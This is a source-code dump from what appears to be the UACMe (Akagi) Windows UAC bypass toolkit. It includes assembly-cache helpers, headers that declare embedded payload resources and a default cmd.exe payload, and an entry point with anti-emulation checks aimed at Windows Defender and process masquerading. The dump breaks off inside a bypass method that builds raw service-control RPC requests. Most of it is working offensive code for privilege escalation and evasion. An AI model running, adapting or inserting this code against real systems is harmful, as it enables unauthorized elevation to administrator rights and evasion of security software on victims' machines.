SIZE_T cchBuffer;
HANDLE hDirectory;
LPWSTR lpFilePath;
WIN32_FIND_DATA fdata;
if (fusUtilpFusionScanFiles(lpDirectory, lpExtension, pfnCallback, pvUserContext))
return TRUE;
//
// Allocate buffer for path including backslash, search mask, terminating null and space for filename.
//
cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);
lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
if (lpFilePath == NULL)
return FALSE;
_strcpy(lpFilePath, lpDirectory);
supConcatenatePaths(lpFilePath, TEXT("*"), cchBuffer);
hDirectory = FindFirstFile(lpFilePath, &fdata);
if (hDirectory != INVALID_HANDLE_VALUE) {
do {
if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
(fdata.cFileName[0] != L'.')
)
{
_strcpy(lpFilePath, lpDirectory);
_strcat(lpFilePath, fdata.cFileName);
bResult = fusUtilScanDirectory(lpFilePath,
lpExtension,
pfnCallback,
pvUserContext);
if (bResult)
break;
}
} while (FindNextFile(hDirectory, &fdata));
FindClose(hDirectory);
}
supHeapFree(lpFilePath);
return bResult;
}
/*
* fusUtilFindFileByMVIDCallback
*
* Purpose:
*
* supFusionScanDirectory callback for MVID comparison.
*
*/
BOOL fusUtilFindFileByMVIDCallback(
_In_ LPWSTR CurrentDirectory,
_In_ WIN32_FIND_DATA* FindData,
_In_ PVOID UserContext
)
{
FUSION_SCAN_PARAM* ScanParam = (FUSION_SCAN_PARAM*)UserContext;
LPWSTR lpFileName;
SIZE_T cchBuffer;
GUID mVid;
RPC_STATUS rpcStatus;
cchBuffer = 2 + MAX_PATH + _strlen(CurrentDirectory);
lpFileName = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
if (lpFileName) {
_strcpy(lpFileName, CurrentDirectory);
supConcatenatePaths(lpFileName, FindData->cFileName, cchBuffer);
if (fusUtilGetImageMVID(lpFileName, &mVid)) {
if (0 == UuidCompare(ScanParam->ReferenceMVID,
&mVid,
&rpcStatus))
{
ScanParam->lpFileName = lpFileName;
return TRUE;
}
}
supHeapFree(lpFileName);
}
return FALSE;
}
#define NI_DLL_EXT L".ni.dll"
#define NI_DLL_AUX_EXT L".ni.dll.aux"
/*
* fusUtilCombineNativeImageCacheName
*
* Purpose:
*
* Build cache image name from assembly name.
*
*/
VOID fusUtilCombineNativeImageCacheName(
_In_ LPCWSTR lpAssemblyName,
_Inout_ LPWSTR lpNativeImageName,
_In_ DWORD cchNativeName,
_In_ BOOLEAN fIsAux
)
{
supConcatenatePaths(lpNativeImageName, lpAssemblyName, cchNativeName);
if (fIsAux) {
_strcat(lpNativeImageName, NI_DLL_AUX_EXT);
}
else {
_strcat(lpNativeImageName, NI_DLL_EXT);
}
}
================================================
FILE: Source/Akagi/fusutil.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2021
*
* TITLE: FUSUTIL.H
*
* VERSION: 3.58
*
* DATE: 01 Dec 2021
*
* Common header file for the Windows Fusion support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//
// Fusion CLI metadata structures
//
typedef struct _STORAGESIGNATURE {
ULONG lSignature; // "Magic" signature.
USHORT iMajorVer; // Major file version.
USHORT iMinorVer; // Minor file version.
ULONG iExtraData; // Offset to next structure of information
ULONG iVersionString; // Length of version string
BYTE pVersion[ANYSIZE_ARRAY]; // Version string
} STORAGESIGNATURE, * PSTORAGESIGNATURE;
typedef struct _STORAGEHEADER {
BYTE fFlags; // STGHDR_xxx flags.
BYTE pad;
USHORT iStreams; // How many streams are there.
} STORAGEHEADER, * PSTORAGEHEADER;
#define MAXSTREAMNAME 32
typedef struct _STORAGESTREAM {
ULONG iOffset; // Offset in file for this stream.
ULONG iSize; // Size of the file.
CHAR rcName[MAXSTREAMNAME];
} STORAGESTREAM, * PSTORAGESTREAM;
#include
typedef struct _STORAGETABLESHEADER {
DWORD Reserved0;
BYTE MajorVersion;
BYTE MinorVersion;
BYTE HeapOffsetSizes;
BYTE Reserved1;
ULARGE_INTEGER Valid;
ULARGE_INTEGER Sorted;
ULONG Rows[ANYSIZE_ARRAY];
} STORAGETABLESHEADER, * PSTORAGETABLESHEADER;
#include
#define STORAGE_MAGIC_SIG 0x424A5342 // BSJB
#define MD_STRINGS_BIT 0x1
#define MD_GUIDS_BIT 0x2
#define MD_BLOBS_BIT 0x4
#define MAX_CLR_TABLES 64
//
// Fusion metadata end
//
//
// Assembly cache scan routine and definitions.
//
typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(
_Out_ IAssemblyEnum** pEnum,
_In_opt_ IUnknown* pUnkReserved,
_In_opt_ IAssemblyName* pName,
_In_ DWORD dwFlags,
_Reserved_ LPVOID pvReserved);
typedef HRESULT(WINAPI* pfnCreateAssemblyCache)(
_Out_ IAssemblyCache** ppAsmCache,
_In_ DWORD dwReserved);
typedef struct _FUSION_SCAN_PARAM {
_In_ GUID* ReferenceMVID;
_Out_ LPWSTR lpFileName;
} FUSION_SCAN_PARAM, * PFUSION_SCAN_PARAM;
typedef BOOL(CALLBACK* pfnFusionScanFilesCallback)(
LPWSTR CurrentDirectory,
WIN32_FIND_DATA* FindData,
PVOID UserContext);
typedef struct _UACME_FUSION_CONTEXT {
BOOL Initialized;
HINSTANCE hFusion;
pfnCreateAssemblyCache CreateAssemblyCache;
pfnCreateAssemblyEnum CreateAssemblyEnum;
} UACME_FUSION_CONTEXT, * PUACME_FUSION_CONTEXT;
BOOLEAN fusUtilInitFusion(
_In_ DWORD dwVersion);
VOID fusUtilBinToUnicodeHex(
_In_ const BYTE* pSrc,
_In_ UINT cSrc,
_Out_cap_(2 * cSrc + 1) LPWSTR pDst);
HRESULT fusUtilGetAssemblyName(
_In_ IAssemblyName* pInterface,
_Inout_ LPWSTR* lpName,
_Out_opt_ PSIZE_T pcchName,
_Inout_opt_ LPWSTR* lpDisplayName,
_Out_opt_ PSIZE_T pcchDisplayName);
BOOL fusUtilGetAssemblyMVIDFromZapCache(
_In_ LPCWSTR AssemblyName,
_Inout_ GUID* ModuleVersionId);
HRESULT fusUtilGetAssemblyPath(
_In_ IAssemblyCache* pInterface,
_In_ LPCWSTR lpAssemblyName,
_Inout_ LPCWSTR* lpAssemblyPath);
BOOLEAN fusUtilGetAssemblyPathByName(
_In_ LPWSTR lpAssemblyName,
_Inout_ LPWSTR* lpAssemblyPath);
BOOL fusUtilReferenceStreamByName(
_In_ STORAGEHEADER* StorageHeader,
_In_ LPCSTR StreamName,
_Out_ PSTORAGESTREAM* StreamRef);
BOOL fusUtilGetImageMVID(
_In_ LPCWSTR lpImageName,
_Out_ GUID* ModuleVersionId);
BOOL fusUtilFindFileByMVIDCallback(
_In_ LPWSTR CurrentDirectory,
_In_ WIN32_FIND_DATA* FindData,
_In_ PVOID UserContext);
BOOL fusUtilScanDirectory(
_In_ LPWSTR lpDirectory,
_In_ LPWSTR lpExtension,
_In_ pfnFusionScanFilesCallback pfnCallback,
_In_opt_ PVOID pvUserContext);
VOID fusUtilCombineNativeImageCacheName(
_In_ LPCWSTR lpAssemblyName,
_Inout_ LPWSTR lpNativeImageName,
_In_ DWORD cchNativeName,
_In_ BOOLEAN fIsAux);
================================================
FILE: Source/Akagi/global.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2023
*
* TITLE: GLOBAL.H
*
* VERSION: 3.65
*
* DATE: 22 Sep 2023
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#if !defined UNICODE
#error ANSI build is not supported
#endif
#include "shared\libinc.h"
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#pragma warning(disable: 6255 6263) // alloca
#pragma warning(disable: 28159)
#define PAYLOAD_ID_NONE MAXDWORD
#define SECRETS_ID IDR_SECRETS
#ifdef _WIN64
#include "bin64res.h"
#define FUBUKI_ID IDR_FUBUKI64
#define AKATSUKI_ID IDR_AKATSUKI64
#define FUBUKI32_ID IDR_FUBUKI32
#define FUBUKI64_ID IDR_FUBUKI64
#define KAMIKAZE_ID IDR_KAMIKAZE
#else
#include "bin32res.h"
#define FUBUKI_ID IDR_FUBUKI32
#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit
#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#endif
#include
#include
#include
#include
#include
#include
#include
#define SECURITY_WIN32
#include
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "rpcrt4.lib")
#pragma comment (lib, "Secur32.lib")
#pragma warning(push)
#pragma warning(disable: 4115) //named type definition in parentheses
#include
#pragma warning(pop)
#include "shared\hde\hde64.h"
#include "shared\ntos\ntos.h"
#include "shared\ntos\ntbuilds.h"
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
#include "shared\ldr.h"
#include "shared\windefend.h"
#include "shared\consts.h"
#include "sup.h"
#include "fusutil.h"
#include "compress.h"
#include "aic.h"
#include "stub.h"
#include "console.h"
#include "methods\methods.h"
//default execution flow
#define AKAGI_FLAG_KILO 1
//suppress all additional output
#define AKAGI_FLAG_TANGO 2
typedef struct _UACME_SHARED_CONTEXT {
HANDLE hIsolatedNamespace;
HANDLE hSharedSection;
HANDLE hCompletionEvent;
} UACME_SHARED_CONTEXT, *PUACME_SHARED_CONTEXT;
typedef struct _UACME_CONTEXT {
BOOLEAN IsWow64;
ULONG Cookie;
ULONG dwBuildNumber;
ULONG AkagiFlag;
ULONG IFileOperationFlags;
// Count of characters
ULONG OptionalParameterLength;
PVOID ucmHeap;
pfnDecompressPayload DecompressRoutine;
pswprintf_s swprintf_s;
UACME_FUSION_CONTEXT FusionContext;
UACME_SHARED_CONTEXT SharedContext;
// Windows directory with end slash
WCHAR szSystemRoot[MAX_PATH + 1];
// Windows\System32 directory with end slash
WCHAR szSystemDirectory[MAX_PATH + 1];
// Current user temp directory with end slash
WCHAR szTempDirectory[MAX_PATH + 1];
// Current program directory with end slash
WCHAR szCurrentDirectory[MAX_PATH + 1];
// Optional parameter, limited to MAX_PATH
WCHAR szOptionalParameter[MAX_PATH + 1];
// Default payload (system32\cmd.exe), limited to MAX_PATH
WCHAR szDefaultPayload[MAX_PATH + 1];
} UACMECONTEXT, *PUACMECONTEXT;
typedef struct _UACME_PARAM_BLOCK {
ULONG Crc32;
ULONG SessionId;
ULONG AkagiFlag;
WCHAR szParameter[MAX_PATH + 1];
WCHAR szDesktop[MAX_PATH + 1];
WCHAR szWinstation[MAX_PATH + 1];
WCHAR szSignalObject[MAX_PATH + 1];
} UACME_PARAM_BLOCK, *PUACME_PARAM_BLOCK;
typedef UINT(WINAPI *pfnEntryPoint)(
_In_ UCM_METHOD Method,
_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
_In_ ULONG OptionalParameterLength
);
typedef struct _UACME_THREAD_CONTEXT {
TEB_ACTIVE_FRAME Frame;
pfnEntryPoint ucmMain;
DWORD ReturnedResult;
ULONG OptionalParameterLength;
LPWSTR OptionalParameter;
} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;
extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;
================================================
FILE: Source/Akagi/main.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: MAIN.C
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* Program entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#define OEMRESOURCE
#include "global.h"
#pragma comment(lib, "comctl32.lib")
//Runtime context global variable
PUACMECONTEXT g_ctx;
//Image Base Address global variable
HINSTANCE g_hInstance;
/*
* ucmInit
*
* Purpose:
*
* Prestart phase with MSE / Windows Defender anti-emulation part.
*
* Note:
*
* supHeapAlloc unavailable during this routine and calls from it.
*
*/
NTSTATUS ucmInit(
_Inout_ UCM_METHOD *RunMethod,
_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
_In_ ULONG OptionalParameterLength
)
{
UCM_METHOD Method;
LPWSTR optionalParameter = NULL;
ULONG optionalParameterLength = 0;
#ifndef _DEBUG
TOKEN_ELEVATION_TYPE ElevType;
#endif
ULONG bytesIO;
WCHAR szBuffer[MAX_PATH + 1];
wdCheckEmulatedVFS();
ucmConsoleInit();
bytesIO = 0;
RtlQueryElevationFlags(&bytesIO);
if ((bytesIO & DBG_FLAG_ELEVATION_ENABLED) == 0)
return STATUS_ELEVATION_REQUIRED;
if (FAILED(CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)))
return STATUS_INTERNAL_ERROR;
InitCommonControls();
if (g_hInstance == NULL)
g_hInstance = (HINSTANCE)NtCurrentPeb()->ImageBaseAddress;
if (*RunMethod == UacMethodInvalid) {
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO == 0) {
return STATUS_INVALID_PARAMETER;
}
Method = (UCM_METHOD)_strtoul(szBuffer);
*RunMethod = Method;
}
else {
Method = *RunMethod;
}
#ifndef _DEBUG
if (Method == UacMethodTest)
return STATUS_INVALID_PARAMETER;
#endif
if (Method >= UacMethodMax)
return STATUS_INVALID_PARAMETER;
#ifndef _DEBUG
ElevType = TokenElevationTypeDefault;
if (supGetElevationType(&ElevType)) {
if (ElevType != TokenElevationTypeLimited) {
return STATUS_NOT_SUPPORTED;
}
}
else {
return STATUS_INTERNAL_ERROR;
}
#endif
//
// Process optional parameter.
//
if ((OptionalParameter == NULL) || (OptionalParameterLength == 0)) {
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
bytesIO = 0;
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO > 0) {
optionalParameter = (LPWSTR)&szBuffer;
optionalParameterLength = bytesIO;
}
}
else {
optionalParameter = OptionalParameter;
optionalParameterLength = OptionalParameterLength;
}
g_ctx = (PUACMECONTEXT)supCreateUacmeContext(Method,
optionalParameter,
optionalParameterLength,
supEncodePointer(DecompressPayload));
if (g_ctx == NULL)
return STATUS_FATAL_APP_EXIT;
return STATUS_SUCCESS;
}
/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
NTSTATUS WINAPI ucmMain(
_In_ UCM_METHOD Method,
_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
_In_ ULONG OptionalParameterLength
)
{
NTSTATUS Status;
UCM_METHOD method = Method;
Status = ucmInit(&method,
OptionalParameter,
OptionalParameterLength);
ucmConsolePrintStatus(TEXT("[*] ucmInit"), Status);
if (!NT_SUCCESS(Status))
return Status;
supMasqueradeProcess(FALSE);
return MethodsManagerCall(method);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
#ifdef _UCM_CONSOLE
ULONG result;
result = StubInit(ucmMain);
ucmConsolePrintValueUlong(TEXT("[+] ucmMain"), result, TRUE);
ucmConsoleRelease();
ExitProcess(result);
#else
ExitProcess(StubInit(ucmMain));
#endif
}
================================================
FILE: Source/Akagi/makecab.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2020
*
* TITLE: MAKECAB.C
*
* VERSION: 3.24
*
* DATE: 20 Apr 2020
*
* Simplified Cabinet file support for makecab utility replacement.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
#pragma comment(lib, "cabinet.lib")
/*
** CAB Callbacks START
*/
LPVOID DIAMONDAPI fnFCIALLOC(
ULONG cb
)
{
return supHeapAlloc((SIZE_T)cb);
}
VOID DIAMONDAPI fnFCIFREE(
VOID HUGE *lpMem
)
{
if (lpMem) supHeapFree((PVOID)lpMem);
}
INT_PTR DIAMONDAPI fnFCIOPEN(
LPSTR pszFile,
int oflag,
int pmode,
int FAR *err,
void FAR *pv
)
{
HANDLE hFile = NULL;
DWORD dwDesiredAccess = 0;
DWORD dwCreationDisposition = 0;
UNREFERENCED_PARAMETER(pv);
UNREFERENCED_PARAMETER(pmode);
if (oflag & _O_RDWR) {
dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
}
else if (oflag & _O_WRONLY) {
dwDesiredAccess = GENERIC_WRITE;
}
else {
dwDesiredAccess = GENERIC_READ;
}
if (oflag & _O_CREAT) {
dwCreationDisposition = CREATE_ALWAYS;
}
else {
dwCreationDisposition = OPEN_EXISTING;
}
hFile = CreateFileA(pszFile,
dwDesiredAccess,
FILE_SHARE_READ,
NULL,
dwCreationDisposition,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
*err = GetLastError();
}
return (INT_PTR)hFile;
}
UINT DIAMONDAPI fnFCIREAD(
INT_PTR hf,
void FAR *memory,
UINT cb,
int FAR *err,
void FAR *pv
)
{
DWORD dwBytesRead = 0;
UNREFERENCED_PARAMETER(pv);
if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL) == FALSE) {
dwBytesRead = (DWORD)-1;
if (err) {
*err = GetLastError();
}
}
return dwBytesRead;
}
UINT DIAMONDAPI fnFCIWRITE(
INT_PTR hf,
void FAR *memory,
UINT cb,
int FAR *err,
void FAR *pv
)
{
DWORD dwBytesWritten = 0;
UNREFERENCED_PARAMETER(pv);
if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL) == FALSE) {
dwBytesWritten = (DWORD)-1;
if (err) {
*err = GetLastError();
}
}
return dwBytesWritten;
}
int DIAMONDAPI fnFCICLOSE(
INT_PTR hf,
int FAR *err,
void FAR *pv
)
{
INT iResult = 0;
UNREFERENCED_PARAMETER(pv);
if (CloseHandle((HANDLE)hf) == FALSE) {
if (err) {
*err = GetLastError();
}
iResult = -1;
}
return iResult;
}
long DIAMONDAPI fnFCISEEK(
INT_PTR hf,
long dist,
int seektype,
int FAR *err,
void FAR *pv
)
{
INT iResult = 0;
// LARGE_INTEGER mdist, ndist;
UNREFERENCED_PARAMETER(pv);
/*
sdist.LowPart = dist;
mdist.HighPart = 0;
ndist.LowPart = 0;
ndist.HighPart = 0;
if (!SetFilePointerEx((HANDLE)hf, mdist, &ndist, seektype)) {
if (err) *err = GetLastError();
}
return ndist.LowPart;
*/
iResult = SetFilePointer((HANDLE)hf, dist, NULL, seektype); //-V303
if (iResult == -1) {
if (err) {
*err = GetLastError();
}
}
return iResult;
}
int DIAMONDAPI fnFCIDELETE(
LPSTR pszFile,
int FAR *err,
void FAR *pv
)
{
INT iResult = 0;
UNREFERENCED_PARAMETER(pv);
if (DeleteFileA(pszFile) == FALSE) {
if (err) {
*err = GetLastError();
}
iResult = -1;
}
return iResult;
}
long DIAMONDAPI fnFCISTATUS(
UINT typeStatus,
ULONG cb1,
ULONG cb2,
void FAR *pv
)
{
UNREFERENCED_PARAMETER(typeStatus);
UNREFERENCED_PARAMETER(cb1);
UNREFERENCED_PARAMETER(cb2);
UNREFERENCED_PARAMETER(pv);
return 0; //not implemented
}
int DIAMONDAPI fnFCIFILEPLACED(
PCCAB pccab,
LPSTR pszFile,
long cbFile,
BOOL fContinuation,
void FAR *pv
)
{
UNREFERENCED_PARAMETER(pccab);
UNREFERENCED_PARAMETER(pszFile);
UNREFERENCED_PARAMETER(cbFile);
UNREFERENCED_PARAMETER(fContinuation);
UNREFERENCED_PARAMETER(pv);
return 0; //not implemented
}
INT_PTR DIAMONDAPI fnFCIGETOPENINFO(
LPSTR pszName,
USHORT *pdate,
USHORT *ptime,
USHORT *pattribs,
int FAR *err,
void FAR *pv
)
{
HANDLE hFile;
FILETIME fileTime;
BY_HANDLE_FILE_INFORMATION fileInfo;
hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);
if (hFile != INVALID_HANDLE_VALUE)
{
if (GetFileInformationByHandle(hFile, &fileInfo)
&& FileTimeToLocalFileTime(&fileInfo.ftCreationTime, &fileTime)
&& FileTimeToDosDateTime(&fileTime, pdate, ptime))
{
*pattribs = (USHORT)fileInfo.dwFileAttributes;
*pattribs &= (
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM |
FILE_ATTRIBUTE_ARCHIVE
);
}
else
{
fnFCICLOSE((INT_PTR)hFile, err, pv);
hFile = INVALID_HANDLE_VALUE;
}
}
return (INT_PTR)hFile;
}
BOOL DIAMONDAPI fnFCIGETTEMPFILE(
char *pszTempName,
int cbTempName,
void FAR *pv
)
{
BOOL bSucceeded = FALSE;
SIZE_T cch;
CHAR szTempPath[MAX_PATH];
CHAR szTempFile[MAX_PATH];
UNREFERENCED_PARAMETER(pv);
RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));
RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));
if (GetTempPathA(MAX_PATH, szTempPath) != 0) {
if (GetTempFileNameA(szTempPath, "ucm", 0, szTempFile) != 0) {
DeleteFileA(szTempFile);
cch = (SIZE_T)(cbTempName / sizeof(CHAR));
_strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));
bSucceeded = TRUE;
}
}
return bSucceeded;
}
BOOL DIAMONDAPI fnFCIGETNEXTCABINET(
PCCAB pccab,
ULONG cbPrevCab,
void FAR *pv
)
{
UNREFERENCED_PARAMETER(pccab);
UNREFERENCED_PARAMETER(cbPrevCab);
UNREFERENCED_PARAMETER(pv);
return FALSE;
}
/*
** CAB Callbacks END
*/
/*
* cabCreate
*
* Purpose:
*
* Initialize cabinet class object.
*
*/
CABDATA *cabCreate(
_In_ LPWSTR lpszCabName
)
{
PCABDATA pCabinet;
CHAR szCab[CB_MAX_CABINET_NAME];
if (lpszCabName == NULL) {
return NULL;
}
RtlSecureZeroMemory(szCab, sizeof(szCab));
if (WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCab, CB_MAX_CABINET_NAME - 2, 0, NULL) == 0) {
return NULL;
}
pCabinet = (PCABDATA)supHeapAlloc(sizeof(CABDATA));
if (pCabinet == NULL)
return NULL;
_strcpy_a(pCabinet->cab.szCab, szCab); //Full name with path or only name (current folder then).
pCabinet->cab.cb = 0x7FFFFFFF; //Maximum cabinet size in bytes.
pCabinet->hfci = FCICreate(
&pCabinet->erf,
fnFCIFILEPLACED,
fnFCIALLOC,
fnFCIFREE,
fnFCIOPEN,
fnFCIREAD,
fnFCIWRITE,
fnFCICLOSE,
fnFCISEEK,
fnFCIDELETE,
fnFCIGETTEMPFILE,
&pCabinet->cab,
NULL);
if (pCabinet->hfci == NULL) {
supHeapFree(pCabinet);
pCabinet = NULL;
}
return pCabinet;
}
/*
* cabAddFile
*
* Purpose:
*
* Insert given file to the previously initialized cabinet object.
*
*/
BOOL cabAddFile(
_In_ CABDATA *Cabinet,
_In_ LPWSTR lpszFileName,
_In_ LPWSTR lpszInternalName
)
{
BOOL bResult = FALSE;
CHAR szFileName[CB_MAX_FILENAME];
CHAR szInternalName[CB_MAX_FILENAME];
do {
if (Cabinet == NULL) {
break;
}
//convert filename to ansi
RtlSecureZeroMemory(szFileName, sizeof(szFileName));
if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szFileName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
break;
}
//convert internal name to ansi
RtlSecureZeroMemory(szInternalName, sizeof(szInternalName));
if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szInternalName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
break;
}
bResult = FCIAddFile(Cabinet->hfci, (char*)szFileName, (char*)szInternalName, FALSE,
fnFCIGETNEXTCABINET, fnFCISTATUS, fnFCIGETOPENINFO, tcompTYPE_NONE /*tcompTYPE_MSZIP*/);
} while (FALSE);
return bResult;
}
/*
* cabClose
*
* Purpose:
*
* Flush file and destroy cabinet class.
*
*/
VOID cabClose(
_In_ CABDATA *Cabinet
)
{
if (Cabinet == NULL) {
return;
}
FCIFlushCabinet(
Cabinet->hfci,
FALSE,
fnFCIGETNEXTCABINET,
fnFCISTATUS
);
FCIDestroy(Cabinet->hfci);
supHeapFree(Cabinet);
}
================================================
FILE: Source/Akagi/makecab.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: MAKECAB.H
*
* VERSION: 2.70
*
* DATE: 25 Mar 2017
*
* Prototypes and definitions for makecab module.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#include
#include
typedef struct _CABDATA {
ERF erf;
CCAB cab;
HFCI hfci;
} CABDATA, *PCABDATA;
CABDATA *cabCreate(
_In_ LPWSTR lpszCabName);
BOOL cabAddFile(
_In_ CABDATA *Cabinet,
_In_ LPWSTR lpszFileName,
_In_ LPWSTR lpszInternalName);
VOID cabClose(
_In_ CABDATA *Cabinet);
================================================
FILE: Source/Akagi/methods/antonioCoco.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2023 - 2025
*
* TITLE: ANTONIOCOCO.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* UAC bypass method from antonioCoco.
*
* https://github.com/antonioCoco/SspiUacBypass
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#define MAX_MESSAGE_SIZE 12000
// rpc command ids
#define RPC_CMD_ID_OPEN_SC_MANAGERW 15
#define RPC_CMD_ID_CREATE_SERVICEW 12
#define RPC_CMD_ID_START_SERVICEW 19
#define RPC_CMD_ID_DELETE_SERVICE 2
// rpc command output lengths
#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24
#define RPC_OUTPUT_LENGTH_CREATE_SERVICE 28
#define RPC_OUTPUT_LENGTH_START_SERVICE 4
#define RPC_OUTPUT_LENGTH_DELETE_SERVICE 4
#define MAX_RPC_PACKET_LENGTH 4096
#define MAX_PROCEDURE_DATA_LENGTH 2048
#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) (((((VALUE_LENGTH) + (ALIGN_BYTES) - 1) / (ALIGN_BYTES)) * (ALIGN_BYTES)) - (VALUE_LENGTH))
// {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR)
#define RPC_NDR_UUID (RPC_WSTR)L"8a885d04-1ceb-11c9-9fe8-08002b104860"
#define SVCCTL_UUID (RPC_WSTR)L"367abb81-9844-35f1-ad32-98f038001003"
typedef struct _RPC_BASE_HEADER {
WORD wVersion;
BYTE bPacketType;
BYTE bPacketFlags;
DWORD dwDataRepresentation;
WORD wFragLength;
WORD wAuthLength;
DWORD dwCallIndex;
} RPC_BASE_HEADER, * PRPC_BASE_HEADER;
typedef struct _RPC_REQUEST_HEADER {
DWORD dwAllocHint;
WORD wContextID;
WORD wProcedureNumber;
} RPC_REQUEST_HEADER, * PRPC_REQUEST_HEADER;
typedef struct _RPC_RESPONSE_HEADER {
DWORD dwAllocHint;
WORD wContextID;
BYTE bCancelCount;
BYTE bAlign[1];
} RPC_RESPONSE_HEADER, * PRPC_RESPONSE_HEADER;
typedef struct _RPC_BIND_REQUEST_CONTEXT_ENTRY {
WORD wContextID;
WORD wTransItemCount;
UUID InterfaceUUID;
DWORD dwInterfaceVersion;
UUID TransferSyntaxUUID;
DWORD dwTransferSyntaxVersion;
} RPC_BIND_REQUEST_CONTEXT_ENTRY, * PRPC_BIND_REQUEST_CONTEXT_ENTRY;
typedef struct _RPC_BIND_REQUEST_HEADER {
WORD wMaxSendFrag;
WORD wMaxRecvFrag;
DWORD dwAssocGroup;
BYTE bContextCount;
BYTE bAlign[3];
RPC_BIND_REQUEST_CONTEXT_ENTRY Context;
